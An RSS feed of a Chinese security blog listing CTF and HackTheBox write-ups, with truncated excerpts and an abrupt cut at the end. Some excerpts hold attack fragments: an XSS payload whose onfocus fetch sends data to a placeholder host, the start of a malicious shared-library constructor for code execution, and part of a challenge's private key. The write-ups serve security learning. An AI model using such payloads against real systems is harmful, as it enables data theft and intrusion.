<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/" version="2.0"><channel><title>ENOCH-lyn Blog</title><link>https://enoch.host</link><atom:link href="https://enoch.host/feed.xml" rel="self" type="application/rss+xml"/><description>好想变强。。。</description><generator>Halo v2.23.0</generator><language>zh-cn</language><image><url>https://enoch.host/upload/ENOCH.jpg</url><title>ENOCH-lyn Blog</title><link>https://enoch.host</link></image><lastBuildDate>Fri, 5 Jun 2026 22:31:29 GMT</lastBuildDate><item><title><![CDATA[ACTF 2026 web 部分]]></title><link>https://enoch.host/archives/actf-2026-web</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=ACTF%202026%20web%20%E9%83%A8%E5%88%86&amp;url=/archives/actf-2026-web" width="1" height="1" alt="" style="opacity:0;">CTF越来越没意思了，已经几乎纯AI了 AI越强就越要防AI，于是题目愈发变难，人类也无能为力，最后还是交给AI 至于人类何去何从？希腊奶 12307 看 Dockerfile： COPY --chmod=0600 --chown=root:root flag /flag ... chown roo]]></description><guid isPermaLink="false">/archives/actf-2026-web</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Mon, 11 May 2026 13:00:00 GMT</pubDate></item><item><title><![CDATA[记第二届腾讯云智能渗透挑战赛]]></title><link>https://enoch.host/archives/tencent-pentration</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E8%AE%B0%E7%AC%AC%E4%BA%8C%E5%B1%8A%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%E8%83%BD%E6%B8%97%E9%80%8F%E6%8C%91%E6%88%98%E8%B5%9B&amp;url=/archives/tencent-pentration" width="1" height="1" alt="" style="opacity:0;">前言 最近打了第二届腾讯云智能渗透挑战赛 我们写的agent第一天非常猛，最强的时候冲到了第四，第一天结束后是第五 可惜设计时没怎么考虑多点渗透和域渗透，因此后面几天较为乏力，最终只拿到了第19名的名次 开源链接如下，仅保留了核心部分，删除了比赛定制功能（比赛API等） ENOCH-lyn/tenc]]></description><guid isPermaLink="false">/archives/tencent-pentration</guid><dc:creator>ENOCH</dc:creator><category>记录</category><category>文章</category><pubDate>Fri, 17 Apr 2026 12:43:42 GMT</pubDate></item><item><title><![CDATA[DesCTF 2026 WP]]></title><link>https://enoch.host/archives/desctf-2026-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=DesCTF%202026%20WP&amp;url=/archives/desctf-2026-wp" width="1" height="1" alt="" style="opacity:0;">一个小队去打，最终是拿了三等奖（总榜第五） Misc infrared_code 题目给了一段智能电视遥控器的红外指令数据，以及一张电视输入界面的截图 先看红外数据，可以发现里面大量重复出现几类命令码。结合附件里的电视型号资料，可以把几个关键按键对上： 16 对应 Up]]></description><guid isPermaLink="false">/archives/desctf-2026-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 15 Mar 2026 10:29:58 GMT</pubDate></item><item><title><![CDATA[HTB Sauna]]></title><link>https://enoch.host/archives/htb-sauna</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB%20Sauna&amp;url=/archives/htb-sauna" width="1" height="1" alt="" style="opacity:0;">Sauna 拿shell 扫端口 $ nmap -p- -sV 10.129.95.180 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-04 02:54 CST Nmap scan report for 10.129.95.180 Ho]]></description><guid isPermaLink="false">/archives/htb-sauna</guid><dc:creator>ENOCH</dc:creator><pubDate>Wed, 4 Mar 2026 11:57:31 GMT</pubDate></item><item><title><![CDATA[HTB Return]]></title><link>https://enoch.host/archives/htb-return</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB%20Return&amp;url=/archives/htb-return" width="1" height="1" alt="" style="opacity:0;">Return 拿shell 先简单nmap看看开放了什么常用端口 # nmap 10.129.242.236 PORT &nbsp; &nbsp; STATE SERVICE 53/tcp &nbsp; open domain 80/tcp &nbsp; open http 88/tcp &nbsp; open kerberos-sec 13]]></description><guid isPermaLink="false">/archives/htb-return</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Sun, 22 Feb 2026 09:37:48 GMT</pubDate></item><item><title><![CDATA[HTB Timelapse]]></title><link>https://enoch.host/archives/htb-timelapse</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB%20Timelapse&amp;url=/archives/htb-timelapse" width="1" height="1" alt="" style="opacity:0;">先nmap PORT &nbsp; &nbsp; STATE SERVICE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; VERSION 53/tcp &nbsp; open domain &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Simple DNS Plus 88/tcp &nbsp; open kerberos-sec &nbsp; &nbsp; Microsoft Windows]]></description><guid isPermaLink="false">/archives/htb-timelapse</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Sat, 14 Feb 2026 09:34:02 GMT</pubDate></item><item><title><![CDATA[HTB Support]]></title><link>https://enoch.host/archives/htb-support</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB%20Support&amp;url=/archives/htb-support" width="1" height="1" alt="" style="opacity:0;">先nmap一下 # nmap -sS -sV -A -Pn 10.129.250.29 &lt;...&gt; PORT &nbsp; &nbsp; STATE SERVICE &nbsp; &nbsp; &nbsp; VERSION 53/tcp &nbsp; open domain &nbsp; &nbsp; &nbsp; Simple DNS Plus 88/tcp &nbsp; open ker]]></description><guid isPermaLink="false">/archives/htb-support</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Thu, 12 Feb 2026 10:19:29 GMT</pubDate></item><item><title><![CDATA[HTB Cicada]]></title><link>https://enoch.host/archives/htb-cicada</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB%20Cicada&amp;url=/archives/htb-cicada" width="1" height="1" alt="" style="opacity:0;">Cicada 先nmap # nmap -sT -p- --min-rate 10000 -o ports 10.129.254.230 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-06 05:09 CST Nmap scan repo]]></description><guid isPermaLink="false">/archives/htb-cicada</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Fri, 6 Feb 2026 12:19:24 GMT</pubDate></item><item><title><![CDATA[HTB EscapeTwo]]></title><link>https://enoch.host/archives/htb-escapetwo</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB%20EscapeTwo&amp;url=/archives/htb-escapetwo" width="1" height="1" alt="" style="opacity:0;">EscapeTwo What is the fully qualified domain name of the machine? # nxc smb 10.129.232.128 SMB &nbsp; &nbsp; &nbsp; &nbsp; 10.129.232.128 445 &nbsp; DC01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [*] Win]]></description><guid isPermaLink="false">/archives/htb-escapetwo</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Fri, 6 Feb 2026 10:57:16 GMT</pubDate></item><item><title><![CDATA[XS-Leak学习记录----正文]]></title><link>https://enoch.host/archives/xsleak-learning</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=XS-Leak%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95----%E6%AD%A3%E6%96%87&amp;url=/archives/xsleak-learning" width="1" height="1" alt="" style="opacity:0;">了解了前置知识后，可以正式进入xsleak的学习了 基于网络时序 这种方法主要是测量响应时间 如果能通过某种方式让命中响应明显变慢或变快，就能通过测量响应时间来判断结果 通常以下内容会影响响应时间]]></description><guid isPermaLink="false">/archives/xsleak-learning</guid><dc:creator>ENOCH</dc:creator><category>记录</category><category>文章</category><pubDate>Mon, 2 Feb 2026 06:32:32 GMT</pubDate></item><item><title><![CDATA[XS-Leak学习记录----前置知识]]></title><link>https://enoch.host/archives/xsleak-before-learning</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=XS-Leak%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95----%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86&amp;url=/archives/xsleak-before-learning" width="1" height="1" alt="" style="opacity:0;">前言 XS-Leaks 的本质是Web侧信道攻击 不同于XSS直接执行代码获取敏感信息，XS-Leaks利用浏览器在处理跨站请求时的细微差异，推断用户的状态或敏感数据 国际赛关于XSS以及xsleak的考察呈逐渐增加的趋势，所以想着系统性的学学xsleak 学]]></description><guid isPermaLink="false">/archives/xsleak-before-learning</guid><dc:creator>ENOCH</dc:creator><category>文章</category><pubDate>Thu, 29 Jan 2026 09:15:47 GMT</pubDate></item><item><title><![CDATA[N1CTF Junior 2026 1/2 出题小记]]></title><link>https://enoch.host/archives/n1ctf-junior-2026-1-2</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=N1CTF%20Junior%202026%201%2F2%20%E5%87%BA%E9%A2%98%E5%B0%8F%E8%AE%B0&amp;url=/archives/n1ctf-junior-2026-1-2" width="1" height="1" alt="" style="opacity:0;">这次依旧是出了两道题 posetman在预期范围内 但是notes差点零解，不得已上了hint是我没想到的 可能是大部分师傅都默认http.server 这种官方库应该不存在CRLF这种问题吧，，， 以下是wp Notes 题目提供了一个笔记应用，admin用户在初始化时会创建一个包含flag的笔记]]></description><guid isPermaLink="false">/archives/n1ctf-junior-2026-1-2</guid><dc:creator>ENOCH</dc:creator><category>文章</category><category>wp</category><pubDate>Tue, 27 Jan 2026 07:18:38 GMT</pubDate></item><item><title><![CDATA[SECCON CTF 14 Quals]]></title><link>https://enoch.host/archives/seccon-ctf-14-quals</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=SECCON%20CTF%2014%20Quals&amp;url=/archives/seccon-ctf-14-quals" width="1" height="1" alt="" style="opacity:0;">期末周，还是做了一题就润了 broken-challenge cookie 在 hack.the.planet.seccon 这个域 /hint 路由给了证书私钥 -----BEGIN EC PRIVATE KEY----- MHcCAQEEIDXSM3v5wDSRra/TS/InNmXoVWqm4]]></description><guid isPermaLink="false">/archives/seccon-ctf-14-quals</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 14 Dec 2025 17:00:00 GMT</pubDate></item><item><title><![CDATA[CyKor CTF 2025 dbchat wp]]></title><link>https://enoch.host/archives/cykor-ctf-2025</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=CyKor%20CTF%202025%20dbchat%20wp&amp;url=/archives/cykor-ctf-2025" width="1" height="1" alt="" style="opacity:0;">最近事情有点多，上线写了一题就去忙其他的了（ dbchat def _generate_sql(self, prompt: str) -&gt; (str, List): m = self._pattern.match(prompt) if not m:]]></description><guid isPermaLink="false">/archives/cykor-ctf-2025</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Mon, 8 Dec 2025 02:10:29 GMT</pubDate></item><item><title><![CDATA[铸剑杯 预选赛 WP]]></title><link>https://enoch.host/archives/zjb-2025-pre-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E9%93%B8%E5%89%91%E6%9D%AF%20%E9%A2%84%E9%80%89%E8%B5%9B%20WP&amp;url=/archives/zjb-2025-pre-wp" width="1" height="1" alt="" style="opacity:0;">CloudEver战队WP 战队排名：12 WEB 浅析PHP原生类 题目提供了一个反序列化入口 @unserialize($_GET]]></description><guid isPermaLink="false">/archives/zjb-2025-pre-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Wed, 26 Nov 2025 07:16:49 GMT</pubDate></item><item><title><![CDATA[RCTF 2025 wp]]></title><link>https://enoch.host/archives/rctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=RCTF%202025%20wp&amp;url=/archives/rctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">photographer flag 在 public/superadmin.php if (Auth::check() &amp;&amp; Auth::type() &lt; $user_types['admin']) { &nbsp; &nbsp;echo getenv('FLAG') ?: 'RCTF{test_flag}'; }]]></description><guid isPermaLink="false">/archives/rctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Tue, 18 Nov 2025 02:00:00 GMT</pubDate></item><item><title><![CDATA[Infobahn CTF 2025]]></title><link>https://enoch.host/archives/infobahn-ctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=Infobahn%20CTF%202025&amp;url=/archives/infobahn-ctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">Sandbox Viewer 未解出，赛后复现 给了个iframe，任意写srcdoc然后删除 let iframe = document.getElementById('safe'); iframe.srcdoc = key; iframe.onload = () =&gt; { iframe.re]]></description><guid isPermaLink="false">/archives/infobahn-ctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Wed, 12 Nov 2025 08:38:53 GMT</pubDate></item><item><title><![CDATA[XCTF final 2025 N1Star web wp]]></title><link>https://enoch.host/archives/xctf-final-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=XCTF%20final%202025%20N1Star%20web%20wp&amp;url=/archives/xctf-final-wp" width="1" height="1" alt="" style="opacity:0;">比赛时写的，比较简陋 kidding 参考文章curl任意库加载实现远程代码执行 (RCE) 根据文章打包so #include &lt;stdlib.h&gt; #include &lt;stdio.h&gt; __attribute__((constructor)) static void rce_init(void]]></description><guid isPermaLink="false">/archives/xctf-final-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Tue, 28 Oct 2025 15:09:40 GMT</pubDate></item><item><title><![CDATA[强网杯2025 CloudEver战队 WP]]></title><link>https://enoch.host/archives/qwb-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E5%BC%BA%E7%BD%91%E6%9D%AF2025%20CloudEver%E6%88%98%E9%98%9F%20WP&amp;url=/archives/qwb-2025-wp" width="1" height="1" alt="" style="opacity:0;">misc Personal Vault string 搜索flag正则，一把嗦 The_Interrogation_Room import socket, re, string from hashlib import sha256 ​ HOST = "47.94.202.253" PORT = 34]]></description><guid isPermaLink="false">/archives/qwb-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 19 Oct 2025 16:00:00 GMT</pubDate></item><item><title><![CDATA[HTB Proxy wp]]></title><link>https://enoch.host/archives/htb-proxy-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB%20Proxy%20wp&amp;url=/archives/htb-proxy-wp" width="1" height="1" alt="" style="opacity:0;">分析 后端有一个flushInterface app.post("/flushInterface", validateInput, async (req, res) =&gt; { &nbsp; const { interface } = req.body; ​ &nbsp; try { &nbsp; &nbsp; &nbsp; const]]></description><guid isPermaLink="false">/archives/htb-proxy-wp</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Wed, 15 Oct 2025 14:15:47 GMT</pubDate></item><item><title><![CDATA[基于LocalStack本地学习AWS]]></title><link>https://enoch.host/archives/use-localstack-learning-aws</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E5%9F%BA%E4%BA%8ELocalStack%E6%9C%AC%E5%9C%B0%E5%AD%A6%E4%B9%A0AWS&amp;url=/archives/use-localstack-learning-aws" width="1" height="1" alt="" style="opacity:0;">配置 皆为windows下的配置 首先要有github学生包，最近更新了，免费使用localstack进行本地aws相关开发，不用真的买存储桶 先安装aws]]></description><guid isPermaLink="false">/archives/use-localstack-learning-aws</guid><dc:creator>ENOCH</dc:creator><category>文章</category><pubDate>Sun, 5 Oct 2025 12:21:48 GMT</pubDate></item><item><title><![CDATA[SunShineCTF 2025]]></title><link>https://enoch.host/archives/sunshinectf-2025</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=SunShineCTF%202025&amp;url=/archives/sunshinectf-2025" width="1" height="1" alt="" style="opacity:0;">没啥意思，写了个白盒就润了 Intergalactic Webhook Service dns重绑定攻击 @app.route('/register', methods=['POST']) def register_webhook(): url = request.form.get('url]]></description><guid isPermaLink="false">/archives/sunshinectf-2025</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Fri, 3 Oct 2025 05:03:08 GMT</pubDate></item><item><title><![CDATA[HTB-Dusty Alleys]]></title><link>https://enoch.host/archives/htb-dusty-alleys</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB-Dusty%20Alleys&amp;url=/archives/htb-dusty-alleys" width="1" height="1" alt="" style="opacity:0;">题目描述 In the dark, dusty underground labyrinth, the survivors feel lost and their resolve weakens. Just as despair sets in, they notice a faint light:]]></description><guid isPermaLink="false">/archives/htb-dusty-alleys</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Tue, 23 Sep 2025 13:20:44 GMT</pubDate></item><item><title><![CDATA[crewCTF 2025 wp]]></title><link>https://enoch.host/archives/crewctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=crewCTF%202025%20wp&amp;url=/archives/crewctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">proxies go过滤器会屏蔽字符串GIVE ME FLAG! go func() { for { n, err := client.Read(buf) if err != nil { if err == io.EOF { slog.Info("Client E]]></description><guid isPermaLink="false">/archives/crewctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><pubDate>Mon, 22 Sep 2025 02:56:46 GMT</pubDate></item><item><title><![CDATA[WMCTF 2025 wp]]></title><link>https://enoch.host/archives/wmctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=WMCTF%202025%20wp&amp;url=/archives/wmctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">前言 好比赛，圆梦一血和二血 Shopping company系列 1 并不是我写出来的 上传压缩包，后台会解压并读取文件让AI分析 只需要压缩包里面有指向flag的软链接，AI便会返回flag 2 同样方式读取源码，发现压缩包里如果是个executable会被自动运行 #include &lt;cstd]]></description><guid isPermaLink="false">/archives/wmctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Mon, 22 Sep 2025 02:56:34 GMT</pubDate></item><item><title><![CDATA[HTB-Sattrack]]></title><link>https://enoch.host/archives/htb-sattrack</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=HTB-Sattrack&amp;url=/archives/htb-sattrack" width="1" height="1" alt="" style="opacity:0;">wp边做边写的，有点乱。。。 题目是黑盒，只能先看看功能了 /login登录，题目给了partner的密码partner@rockyou.xyz:partn3r123 登录进去之后的几个路由几乎都是纯静态 有个share功能，会回显json，例如 /partner/share?t]]></description><guid isPermaLink="false">/archives/htb-sattrack</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Fri, 19 Sep 2025 07:38:32 GMT</pubDate></item><item><title><![CDATA[N1CTF junior 2025 (2/2)出题小记]]></title><link>https://enoch.host/archives/n1ctf-junior-2025</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=N1CTF%20junior%202025%20%282%2F2%29%E5%87%BA%E9%A2%98%E5%B0%8F%E8%AE%B0&amp;url=/archives/n1ctf-junior-2025" width="1" height="1" alt="" style="opacity:0;">这次出了两个web题，一个ping一个unfinished 其中ping是当半个签到用的，效果也还算符合预期 但是unfinished被非预期麻了 直接document.cookie也能泄露出cookies，不用绕httponly（因为打错字了... 以下是wp ping 这题乍一看神似当初入门we]]></description><guid isPermaLink="false">/archives/n1ctf-junior-2025</guid><dc:creator>ENOCH</dc:creator><category>文章</category><category>wp</category><pubDate>Mon, 15 Sep 2025 03:12:39 GMT</pubDate></item><item><title><![CDATA[hackthebox Pod Diagnostics]]></title><link>https://enoch.host/archives/hackthebox-pod-diagnostics</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=hackthebox%20Pod%20Diagnostics&amp;url=/archives/hackthebox-pod-diagnostics" width="1" height="1" alt="" style="opacity:0;">题目描述 We've discovered a mining pod tunnelling underneath a government facility. Luckily, we've managed to connect to an air-gapped control panel that]]></description><guid isPermaLink="false">/archives/hackthebox-pod-diagnostics</guid><dc:creator>ENOCH</dc:creator><category>hackthebox</category><pubDate>Thu, 28 Aug 2025 12:02:32 GMT</pubDate></item><item><title><![CDATA[SEKAI 2025 Discrepancy]]></title><link>https://enoch.host/archives/sekai-2025</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=SEKAI%202025%20Discrepancy&amp;url=/archives/sekai-2025" width="1" height="1" alt="" style="opacity:0;">本文首发于先知社区（为了赚点积分（ 探究python中pickle，_pickle和pickletools的解析差异问题 前言 来看SEKAI 2025的Discrepancy ### IMPORTS ### from pickle import _Unpickler as py_unpickler]]></description><guid isPermaLink="false">/archives/sekai-2025</guid><dc:creator>ENOCH</dc:creator><category>文章</category><category>wp</category><pubDate>Tue, 19 Aug 2025 04:50:06 GMT</pubDate></item><item><title><![CDATA[LILCTF 2025 wp]]></title><link>https://enoch.host/archives/lilctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=LILCTF%202025%20wp&amp;url=/archives/lilctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">前言 跟着队伍OTSASumuvior ，最终队伍排名为第一名 打了一天这个之后还要去打SEKAI CTF 我曾有一份工作 题目描述中有备份，直接开扫，扫到了www.zip 里面是网站源码，包含一堆配置以及密钥 审计之后发现只要有UC_KEY就可以备份数据库 api/db/dbbak.php &lt;?p]]></description><guid isPermaLink="false">/archives/lilctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Tue, 19 Aug 2025 04:50:03 GMT</pubDate></item><item><title><![CDATA[UIUCTF 2025 wp]]></title><link>https://enoch.host/archives/uiuctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=UIUCTF%202025%20wp&amp;url=/archives/uiuctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">前言 第二天有事，没怎么写 Ruler of the Universe ${String(value).replace('"', "&amp;quot;")} 这地方只转义第一个”,剩下的不会转义,用两个”即可闭合 "" autofocus onfocus="fetch('&lt;https://xx/?'&gt;]]></description><guid isPermaLink="false">/archives/uiuctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Fri, 1 Aug 2025 05:33:12 GMT</pubDate></item><item><title><![CDATA[Handlebars的ast语法树注入问题]]></title><link>https://enoch.host/archives/Handlebars-AST-syntax-tree-injection-issue</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=Handlebars%E7%9A%84ast%E8%AF%AD%E6%B3%95%E6%A0%91%E6%B3%A8%E5%85%A5%E9%97%AE%E9%A2%98&amp;url=/archives/Handlebars-AST-syntax-tree-injection-issue" width="1" height="1" alt="" style="opacity:0;">前言 先来看一道题（DownUnderCTF 2025），题目只给了一个dockerfile FROM alpine:latest AS flag-builder ​ WORKDIR /build RUN apk add gcc musl-dev RUN cat &lt;&lt;EOF &gt; getflag.c]]></description><guid isPermaLink="false">/archives/Handlebars-AST-syntax-tree-injection-issue</guid><dc:creator>ENOCH</dc:creator><category>文章</category><pubDate>Wed, 23 Jul 2025 08:35:03 GMT</pubDate></item><item><title><![CDATA[DownUnderCTF 2025 wp]]></title><link>https://enoch.host/archives/downunderctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=DownUnderCTF%202025%20wp&amp;url=/archives/downunderctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">前言 时间充裕，所以输出还行 整体题目难的很难，简单的又挺简单 Sweet Treat admin/review这里没过滤，只要设置profile为payload &lt;div class="profile-card"&gt; &lt;h4&gt;Username:]]></description><guid isPermaLink="false">/archives/downunderctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sun, 20 Jul 2025 09:34:40 GMT</pubDate></item><item><title><![CDATA[春秋云镜 Initial wp]]></title><link>https://enoch.host/archives/chunqiu-yunjing-initial-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C%20Initial%20wp&amp;url=/archives/chunqiu-yunjing-initial-wp" width="1" height="1" alt="" style="opacity:0;">前言 想着要学渗透了。学了点前置知识就来打了，结果中途在配置代理，网络上面花了好久 而且春秋云镜的靶场。。。好贵 记录 扫端口 22 80 25 110 80进去是一共登录页，扫出来是think php，直接拿一把梭工具getShell [+] 目标存在tp5_construct_code_exec]]></description><guid isPermaLink="false">/archives/chunqiu-yunjing-initial-wp</guid><dc:creator>ENOCH</dc:creator><category>春秋云镜</category><pubDate>Tue, 15 Jul 2025 14:37:32 GMT</pubDate></item><item><title><![CDATA[L3HCTF 2025 wp]]></title><link>https://enoch.host/archives/l3hctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=L3HCTF%202025%20wp&amp;url=/archives/l3hctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">前言 终于放假了，有了较为充分的时间打比赛，写的题目数量也比之前多点 best_profile 先看源码 @app.route("/get_last_ip/&lt;string:username&gt;", methods=["GET", "POST"]) def route_check_ip(username]]></description><guid isPermaLink="false">/archives/l3hctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Mon, 14 Jul 2025 03:56:12 GMT</pubDate></item><item><title><![CDATA[Google CTF 2025]]></title><link>https://enoch.host/archives/google-ctf-2025</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=Google%20CTF%202025&amp;url=/archives/google-ctf-2025" width="1" height="1" alt="" style="opacity:0;">BpfBox func spawnShell(ctx context.Context) error { withTimeout, cancel := context.WithTimeout(ctx, time.Minute) defer cancel() cmd := exec.Comman]]></description><guid isPermaLink="false">/archives/google-ctf-2025</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Mon, 30 Jun 2025 02:01:55 GMT</pubDate></item><item><title><![CDATA[大一总结]]></title><link>https://enoch.host/archives/Freshman-summary</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E5%A4%A7%E4%B8%80%E6%80%BB%E7%BB%93&amp;url=/archives/Freshman-summary" width="1" height="1" alt="" style="opacity:0;">前言 时间好快，不知不觉大一就要结束了。想着写篇总结吧，为大一生活划上句号，于是有了这篇文章。 也不完全是CTF相关，更多的是对整个大一生活的记录与总结吧 8月 开学了（22号），怀着懵懂与无知，踏上大学生活 看着手里的综合测评细则，想着保研似乎好难，好像要参加好多活动，成绩还要很好才行 带着这样的]]></description><guid isPermaLink="false">/archives/Freshman-summary</guid><dc:creator>ENOCH</dc:creator><category>记录</category><pubDate>Sun, 29 Jun 2025 10:32:44 GMT</pubDate></item><item><title><![CDATA[MaltaCTF 2025 wp]]></title><link>https://enoch.host/archives/maltactf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=MaltaCTF%202025%20wp&amp;url=/archives/maltactf-2025-wp" width="1" height="1" alt="" style="opacity:0;">Starboard @app.route('/', methods=['GET']) def index(): order = request.args.get('order', 'DESC') if ';' in order or ',' in order: ret]]></description><guid isPermaLink="false">/archives/maltactf-2025-wp</guid><dc:creator>ENOCH</dc:creator><pubDate>Sun, 22 Jun 2025 08:58:17 GMT</pubDate></item><item><title><![CDATA[蓝桥杯国赛网络安全赛道wp 2025]]></title><link>https://enoch.host/archives/lanqiao-National-competition-Network-security-wp-2025</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=%E8%93%9D%E6%A1%A5%E6%9D%AF%E5%9B%BD%E8%B5%9B%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%B5%9B%E9%81%93wp%202025&amp;url=/archives/lanqiao-National-competition-Network-security-wp-2025" width="1" height="1" alt="" style="opacity:0;">前言 平时用的台式机，这次用笔记本发现很多工具和环境没有，加上没怎么准备，打的很烂（毕竟我一个web手咋写全方向题嘛） 太惨淡了，wp仅供参考 log 查看日志，注意到 [Unit] Description=System Backdoor Service (Disguised) After=netw]]></description><guid isPermaLink="false">/archives/lanqiao-National-competition-Network-security-wp-2025</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Sat, 21 Jun 2025 06:50:11 GMT</pubDate></item><item><title><![CDATA[bi0sCTF 2025 wp]]></title><link>https://enoch.host/archives/bi0sctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=bi0sCTF%202025%20wp&amp;url=/archives/bi0sctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">两道小web题的wp Qoutes App 这里的new URL 在quoteid为伪协议加路径时就会直接使用其构造url 而fetch是支持data伪协议的，所以直接]]></description><guid isPermaLink="false">/archives/bi0sctf-2025-wp</guid><dc:creator>ENOCH</dc:creator><category>wp</category><pubDate>Tue, 10 Jun 2025 14:20:02 GMT</pubDate></item><item><title><![CDATA[D3CTF 2025 wp]]></title><link>https://enoch.host/archives/d3ctf-2025-wp</link><description><![CDATA[<img src="https://enoch.host/plugins/feed/assets/telemetry.gif?title=D3CTF%202025%20wp&amp;url=/archives/d3ctf-2025-wp" width="1" height="1" alt="" style="opacity:0;">前言 队伍里出了点小事情，具体请看下方链接 关于MNGA在D3CTF 2025被禁赛的情况说明 d3model 打CVE-2025-1550，应该是pickle反序列化 相关文章]]></description><guid 